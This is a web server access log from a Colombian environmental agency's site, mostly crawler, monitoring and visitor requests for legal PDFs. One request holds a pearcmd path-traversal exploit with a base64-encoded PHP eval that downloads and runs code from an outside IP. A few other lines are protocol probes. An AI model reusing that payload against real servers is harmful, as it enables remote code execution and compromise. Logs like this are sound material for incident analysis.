66.249.66.21 - - [03/Feb/2024:06:37:23 -0500] "GET /Publicaciones/2023EE173835.pdf HTTP/1.1" 404 228
66.249.66.20 - - [03/Feb/2024:06:38:25 -0500] "GET /BLA/resoluciones/Autos%202008/2794.pdf HTTP/1.1" 200 109420
66.249.66.20 - - [03/Feb/2024:06:39:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2869.pdf HTTP/1.1" 200 530664
201.245.192.253 - - [03/Feb/2024:06:39:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40544
201.245.192.253 - - [03/Feb/2024:06:39:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40050
201.245.192.253 - - [03/Feb/2024:06:39:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40548
152.32.151.121 - - [03/Feb/2024:06:39:24 -0500] "GET / HTTP/1.1" 200 319
152.32.151.121 - - [03/Feb/2024:06:39:25 -0500] "\x16\x03\x01" 400 226
152.32.151.121 - - [03/Feb/2024:06:39:26 -0500] "t3 12.1.2" 400 946
66.249.66.19 - - [03/Feb/2024:06:39:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2013.pdf HTTP/1.1" 200 684062
201.245.192.253 - - [03/Feb/2024:06:40:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40050
216.245.221.92 - - [03/Feb/2024:06:41:03 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.21 - - [03/Feb/2024:06:41:05 -0500] "GET /BLA/resoluciones/Autos%202008/0941.pdf HTTP/1.1" 200 110340
201.245.192.253 - - [03/Feb/2024:06:41:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
66.249.66.20 - - [03/Feb/2024:06:41:23 -0500] "GET /BLA/resoluciones/AUTOS%202016/1113.pdf HTTP/1.1" 200 349894
66.249.66.20 - - [03/Feb/2024:06:41:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1896.pdf HTTP/1.1" 200 728277
157.55.39.10 - - [03/Feb/2024:06:41:33 -0500] "GET /BLA/resoluciones/AUTOS%202023/4515.pdf HTTP/1.1" 200 641647
172.22.2.4 - - [03/Feb/2024:06:40:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Feb/2024:06:42:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [03/Feb/2024:06:41:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53002
40.77.167.41 - - [03/Feb/2024:06:44:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1389.pdf HTTP/1.1" 304 -
40.77.167.68 - - [03/Feb/2024:06:45:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0010.pdf HTTP/1.1" 304 -
216.245.221.92 - - [03/Feb/2024:06:46:03 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Feb/2024:06:46:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
168.119.101.10 - - [03/Feb/2024:06:46:40 -0500] "GET / HTTP/1.1" 200 4720
66.249.66.20 - - [03/Feb/2024:06:46:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/5715.pdf HTTP/1.1" 200 591366
172.22.2.4 - - [03/Feb/2024:06:46:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [03/Feb/2024:06:48:04 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
216.244.66.195 - - [03/Feb/2024:06:48:26 -0500] "GET /robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [03/Feb/2024:06:47:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58303
52.167.144.181 - - [03/Feb/2024:06:49:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/1695.pdf HTTP/1.1" 304 -
66.249.66.20 - - [03/Feb/2024:06:49:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1329.pdf HTTP/1.1" 200 464683
52.167.144.189 - - [03/Feb/2024:06:50:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0748.pdf HTTP/1.1" 200 403120
66.249.66.21 - - [03/Feb/2024:06:50:30 -0500] "GET /BLA/resoluciones/AUTOS%202008/1027.pdf HTTP/1.1" 200 165474
216.245.221.92 - - [03/Feb/2024:06:51:03 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Feb/2024:06:51:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
95.108.213.113 - - [03/Feb/2024:06:51:33 -0500] "GET /robots.txt HTTP/1.1" 404 1018
213.180.203.98 - - [03/Feb/2024:06:51:33 -0500] "GET / HTTP/1.1" 200 319
66.249.66.21 - - [03/Feb/2024:06:53:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0728.pdf HTTP/1.1" 200 335316
87.250.224.207 - - [03/Feb/2024:06:53:41 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [03/Feb/2024:06:52:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Feb/2024:06:52:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51580
207.46.13.155 - - [03/Feb/2024:06:55:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2927.pdf HTTP/1.1" 304 -
216.245.221.92 - - [03/Feb/2024:06:56:03 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Feb/2024:06:56:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
172.22.2.4 - - [03/Feb/2024:06:57:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
194.165.16.73 - - [03/Feb/2024:07:00:05 -0500] "\x03" 400 226
172.22.2.4 - - [03/Feb/2024:06:58:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60676
216.245.221.92 - - [03/Feb/2024:07:01:03 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Feb/2024:07:01:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
216.244.66.195 - - [03/Feb/2024:07:02:14 -0500] "GET /BLA/resoluciones/AUTOS%202020/0566.pdf HTTP/1.1" 200 579988
40.77.167.53 - - [03/Feb/2024:07:02:31 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
207.46.13.155 - - [03/Feb/2024:07:02:35 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
216.244.66.195 - - [03/Feb/2024:07:02:56 -0500] "GET /BLA/resoluciones/AUTOS%202020/0811.pdf HTTP/1.1" 200 352084
66.249.66.21 - - [03/Feb/2024:07:03:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0518.pdf HTTP/1.1" 200 687426
216.244.66.195 - - [03/Feb/2024:07:03:27 -0500] "GET /BLA/resoluciones/AUTOS%202020/0984.pdf HTTP/1.1" 200 563982
216.244.66.195 - - [03/Feb/2024:07:04:01 -0500] "GET /BLA/resoluciones/AUTOS%202020/2332.pdf HTTP/1.1" 200 337164
216.244.66.195 - - [03/Feb/2024:07:04:30 -0500] "GET /BLA/resoluciones/AUTOS%202020/2408.pdf HTTP/1.1" 200 314929
216.244.66.195 - - [03/Feb/2024:07:05:00 -0500] "GET /BLA/resoluciones/AUTOS%202020/2719.pdf HTTP/1.1" 200 326070
172.22.2.4 - - [03/Feb/2024:07:03:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [03/Feb/2024:07:05:32 -0500] "GET /BLA/resoluciones/AUTOS%202020/2784.pdf HTTP/1.1" 200 319670
216.244.66.195 - - [03/Feb/2024:07:05:57 -0500] "GET /BLA/resoluciones/AUTOS%202020/2974.pdf HTTP/1.1" 200 370208
216.245.221.92 - - [03/Feb/2024:07:06:03 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Feb/2024:07:06:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
172.22.2.4 - - [03/Feb/2024:07:04:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61040
216.244.66.195 - - [03/Feb/2024:07:06:25 -0500] "GET /BLA/resoluciones/AUTOS%202020/3006.pdf HTTP/1.1" 200 301347
216.244.66.195 - - [03/Feb/2024:07:06:49 -0500] "GET /BLA/resoluciones/AUTOS%202020/3554.pdf HTTP/1.1" 200 385593
216.244.66.195 - - [03/Feb/2024:07:07:11 -0500] "GET /BLA/resoluciones/AUTOS%202020/3714.pdf HTTP/1.1" 200 417247
216.244.66.195 - - [03/Feb/2024:07:07:33 -0500] "GET /BLA/resoluciones/AUTOS%202020/3729.pdf HTTP/1.1" 200 567312
52.167.144.219 - - [03/Feb/2024:07:07:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4283.pdf HTTP/1.1" 304 -
216.244.66.195 - - [03/Feb/2024:07:07:57 -0500] "GET /BLA/resoluciones/AUTOS%202020/3824.pdf HTTP/1.1" 200 347467
216.244.66.195 - - [03/Feb/2024:07:08:17 -0500] "GET /BLA/resoluciones/AUTOS%202020/4367.pdf HTTP/1.1" 200 388869
216.244.66.195 - - [03/Feb/2024:07:08:36 -0500] "GET /BLA/resoluciones/AUTOS%202020/4750.pdf HTTP/1.1" 200 359088
216.244.66.195 - - [03/Feb/2024:07:09:56 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2004%2FRES+2004+651-700%2F HTTP/1.1" 200 12049
69.63.184.116 - - [03/Feb/2024:07:09:59 -0500] "GET /dia-nacional-de-los-parques-nacionales-naturales-chingaza-y-sumapaz-riquezas-ambientales-de-bogota.html HTTP/1.1" 200 1182
216.245.221.92 - - [03/Feb/2024:07:11:03 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Feb/2024:07:11:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
172.22.2.4 - - [03/Feb/2024:07:09:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Feb/2024:07:10:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51144
172.22.2.4 - - [03/Feb/2024:07:10:42 -0500] "GET /BLA/boletinlegal/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?eval(base64_decode('aWYoZmlsdGVyX3ZhcihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSxGSUxURVJfVkFMSURBVEVfQk9PTEVBTikpe2V2YWwoZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpKTt9ZWxzZXskaD1jdXJsX2luaXQoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpO2N1cmxfc2V0b3B0KCRoLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGgsQ1VSTE9QVF9IRUFERVIsMCk7ZXZhbChjdXJsX2V4ZWMoJGgpKTtjdXJsX2Nsb3NlKCRoKTt9'));?>+/tmp/index.php HTTP/1.1" 200 45003
207.46.13.17 - - [03/Feb/2024:07:13:38 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200015%20del%2003%20de%20Octubre%20de%202019.pdf HTTP/1.1" 304 -
216.244.66.195 - - [03/Feb/2024:07:14:53 -0500] "GET /BLA/resoluciones/AUTOS%202022/0795.pdf HTTP/1.1" 200 1697619
216.244.66.195 - - [03/Feb/2024:07:15:15 -0500] "GET /BLA/resoluciones/AUTOS%202022/1878.pdf HTTP/1.1" 200 570085
216.244.66.195 - - [03/Feb/2024:07:15:33 -0500] "GET /BLA/resoluciones/AUTOS%202022/2027.pdf HTTP/1.1" 200 4541439
216.245.221.92 - - [03/Feb/2024:07:16:03 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [03/Feb/2024:07:16:06 -0500] "GET /BLA/resoluciones/AUTOS%202022/2155.pdf HTTP/1.1" 200 483145
201.245.192.253 - - [03/Feb/2024:07:16:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
216.244.66.195 - - [03/Feb/2024:07:16:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/2157.pdf HTTP/1.1" 200 263435
216.244.66.195 - - [03/Feb/2024:07:17:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/4338.pdf HTTP/1.1" 200 340865
172.22.2.4 - - [03/Feb/2024:07:15:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [03/Feb/2024:07:17:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1888.pdf HTTP/1.1" 200 513802
172.22.2.4 - - [03/Feb/2024:07:16:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60676
216.244.66.195 - - [03/Feb/2024:07:18:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2425.pdf HTTP/1.1" 200 515149
172.22.2.4 - - [03/Feb/2024:07:18:43 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8397
172.22.2.4 - - [03/Feb/2024:07:18:43 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
201.245.192.253 - - [03/Feb/2024:07:19:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40563
201.245.192.253 - - [03/Feb/2024:07:19:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40067
201.245.192.253 - - [03/Feb/2024:07:19:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40558
201.245.192.253 - - [03/Feb/2024:07:20:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40067
172.22.2.4 - - [03/Feb/2024:07:20:59 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
216.245.221.92 - - [03/Feb/2024:07:21:03 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Feb/2024:07:21:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
172.22.2.4 - - [03/Feb/2024:07:21:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Feb/2024:07:22:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60676
216.245.221.92 - - [03/Feb/2024:07:26:03 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Feb/2024:07:26:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
172.22.2.4 - - [03/Feb/2024:07:26:49 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [03/Feb/2024:07:26:51 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000002%20DEL%2020%20DE%20FEBRERO%20DEL%202023.pdf HTTP/1.1" 200 333231
172.22.2.4 - - [03/Feb/2024:07:26:53 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2001%20del%2017%20de%20Enero%20de%202017.pdf HTTP/1.1" 200 2804310
172.22.2.4 - - [03/Feb/2024:07:27:19 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%205%20del%2013%20de%20junio%20de%202013.pdf HTTP/1.1" 200 110904
172.22.2.4 - - [03/Feb/2024:07:27:35 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%201%20del%205%20de%20Abril%20de%202011.pdf HTTP/1.1" 200 971292
172.22.2.4 - - [03/Feb/2024:07:28:13 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 200 311468
172.22.2.4 - - [03/Feb/2024:07:28:39 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%202%20del%201%20de%20julio%20de%202015.pdf HTTP/1.1" 200 752890
172.22.2.4 - - [03/Feb/2024:07:28:41 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000004%20DEL%2019%20DE%20MAYO%20DEL%202022.pdf HTTP/1.1" 200 252981
172.22.2.4 - - [03/Feb/2024:07:27:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Feb/2024:07:28:48 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200015%20del%2003%20de%20Octubre%20de%202019.pdf HTTP/1.1" 200 165608
172.22.2.4 - - [03/Feb/2024:07:28:52 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%206%20del%2025%20de%20Mayo%20de%202012.pdf HTTP/1.1" 200 387391
201.245.192.253 - - [03/Feb/2024:07:29:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40563
201.245.192.253 - - [03/Feb/2024:07:29:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40067
201.245.192.253 - - [03/Feb/2024:07:29:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40558
172.22.2.4 - - [03/Feb/2024:07:27:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61040
201.245.192.253 - - [03/Feb/2024:07:30:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40067
172.22.2.4 - - [03/Feb/2024:07:30:35 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
216.245.221.92 - - [03/Feb/2024:07:31:03 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Feb/2024:07:31:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
172.22.2.4 - - [03/Feb/2024:07:32:11 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [03/Feb/2024:07:32:13 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [03/Feb/2024:07:32:13 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000009%20DEL%2010%20DE%20OCTUBRE%20DEL%202022.pdf HTTP/1.1" 200 292772
172.22.2.4 - - [03/Feb/2024:07:32:15 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [03/Feb/2024:07:32:15 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [03/Feb/2024:07:32:16 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [03/Feb/2024:07:32:16 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
52.167.144.235 - - [03/Feb/2024:07:32:55 -0500] "GET /BLA/resoluciones/AUTOS%202017/3721.pdf HTTP/1.1" 304 -
66.249.66.19 - - [03/Feb/2024:07:34:22 -0500] "GET /Publicaciones/2023EE291552.pdf HTTP/1.1" 404 228
172.22.2.4 - - [03/Feb/2024:07:32:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Feb/2024:07:33:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60676
216.245.221.92 - - [03/Feb/2024:07:36:03 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Feb/2024:07:36:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
173.252.127.14 - - [03/Feb/2024:07:37:33 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
52.167.144.216 - - [03/Feb/2024:07:38:28 -0500] "GET /BLA/resoluciones/AUTOS%202019/0206.pdf HTTP/1.1" 200 273432
172.22.2.4 - - [03/Feb/2024:07:37:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45003
201.245.192.253 - - [03/Feb/2024:07:39:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40563
201.245.192.253 - - [03/Feb/2024:07:39:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40067
201.245.192.253 - - [03/Feb/2024:07:39:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40558
157.55.39.54 - - [03/Feb/2024:07:40:06 -0500] "GET /BLA/resoluciones/AUTOS%202020/2341.pdf HTTP/1.1" 200 338909
201.245.192.253 - - [03/Feb/2024:07:40:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40067
172.22.2.4 - - [03/Feb/2024:07:38:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [03/Feb/2024:07:41:03 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Feb/2024:07:41:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
172.22.2.4 - - [03/Feb/2024:07:39:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58677
216.244.66.195 - - [03/Feb/2024:07:42:15 -0500] "GET /robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [03/Feb/2024:07:43:50 -0500] "GET /BLA/boletinlegal/3rdpartylicenses.txt HTTP/1.1" 404 1011
216.245.221.92 - - [03/Feb/2024:07:46:03 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Feb/2024:07:46:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
172.22.2.4 - - [03/Feb/2024:07:44:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
31.13.103.8 - - [03/Feb/2024:07:47:05 -0500] "GET /images/30%20de%20enero%20Entrenubes%20alcalde.jpeg HTTP/1.1" 200 64486
172.22.2.4 - - [03/Feb/2024:07:45:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58677
69.63.189.8 - - [03/Feb/2024:07:47:08 -0500] "GET /alcalde-mayor-recorrio-zona-del-parque-entrenubes-afectada-por-incendio-forestal.html HTTP/1.1" 200 922
66.249.66.21 - - [03/Feb/2024:07:48:01 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2276.pdf HTTP/1.1" 304 -
34.174.152.29 - - [03/Feb/2024:07:50:16 -0500] "HEAD /BLA/resoluciones/RESOLUCIONES%202017/0520.pdf HTTP/1.1" 200 -
216.245.221.92 - - [03/Feb/2024:07:51:03 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Feb/2024:07:51:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
172.22.2.4 - - [03/Feb/2024:07:50:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
69.171.231.10 - - [03/Feb/2024:07:52:27 -0500] "GET /senderos-en-los-cerros-orientales-cerrados-temporalmente-por-incendios-forestales.html HTTP/1.1" 200 991
173.252.107.118 - - [03/Feb/2024:07:52:38 -0500] "GET /senderos-en-los-cerros-orientales-cerrados-temporalmente-por-incendios-forestales.html HTTP/1.1" 200 991
172.22.2.4 - - [03/Feb/2024:07:51:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61040
207.46.13.168 - - [03/Feb/2024:07:54:10 -0500] "GET /BLA/resoluciones/AUTOS%202017/1947.pdf HTTP/1.1" 304 -
216.245.221.92 - - [03/Feb/2024:07:56:03 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Feb/2024:07:56:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
172.22.2.4 - - [03/Feb/2024:07:56:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [03/Feb/2024:07:58:40 -0500] "GET /BLA/resoluciones/AUTOS%202020/0530.pdf HTTP/1.1" 200 466002
172.22.2.4 - - [03/Feb/2024:07:57:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60676
216.244.66.195 - - [03/Feb/2024:07:59:17 -0500] "GET /BLA/resoluciones/AUTOS%202020/0786.pdf HTTP/1.1" 200 334242
216.244.66.195 - - [03/Feb/2024:07:59:47 -0500] "GET /BLA/resoluciones/AUTOS%202020/1217.pdf HTTP/1.1" 200 325782
216.244.66.195 - - [03/Feb/2024:08:00:21 -0500] "GET /BLA/resoluciones/AUTOS%202020/1333.pdf HTTP/1.1" 200 358092
216.244.66.195 - - [03/Feb/2024:08:00:49 -0500] "GET /BLA/resoluciones/AUTOS%202020/1368.pdf HTTP/1.1" 200 359506
201.245.192.253 - - [03/Feb/2024:08:01:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
216.245.221.92 - - [03/Feb/2024:08:01:03 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [03/Feb/2024:08:01:19 -0500] "GET /BLA/resoluciones/AUTOS%202020/1937.pdf HTTP/1.1" 200 351912
216.244.66.195 - - [03/Feb/2024:08:01:50 -0500] "GET /BLA/resoluciones/AUTOS%202020/1960.pdf HTTP/1.1" 200 377005
104.152.52.221 - - [03/Feb/2024:08:01:51 -0500] "GET / HTTP/1.0" 200 319
